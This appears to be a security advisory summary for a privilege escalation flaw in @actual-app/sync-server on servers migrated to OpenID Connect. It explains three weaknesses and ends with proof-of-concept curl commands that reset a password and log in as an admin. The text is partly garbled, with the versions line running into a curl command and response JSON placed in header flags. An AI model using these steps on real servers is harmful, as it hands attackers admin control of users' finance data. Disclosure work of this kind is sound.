# Vulnerability Summary: Privilege Escalation on 'change-password' Endpoint of OpenID-Migrated Servers ## Vulnerability Overview On servers migrated from password authentication to OpenID Connect, any authenticated user (including those with the BASIC role) can escalate privileges to ADMIN. This vulnerability is composed of three weaknesses: 1. The `POST /account/change-password` endpoint lacks authorization checks, allowing any user to overwrite the password hash. 2. After migration, the old password row (inactive password auth row) is not deleted, and the login endpoint accepts a client-provided `loginMethod`, thereby bypassing the server’s active authentication configuration. 3. An attacker can exploit the above two issues to set a known password and authenticate as an anonymous admin account. ## Impact Scope * **Affected Versions**: `@actual-app/sync-server` /account/change-password \ -H "Content-Type: application/json" \ -H "X-Actual-Token: " \ -d '{"password": "attacker123"}' \ -H '{"status":"ok","data":[]}' # Step 2 - log in via password method to obtain an ADMIN session curl -s -X POST https:///account/login \ -H "Content-Type: application/json" \ -d '{"loginMethod": "password", "password": "attacker123"}' \ -H '{"status":"ok","data":{"token":""}}' ```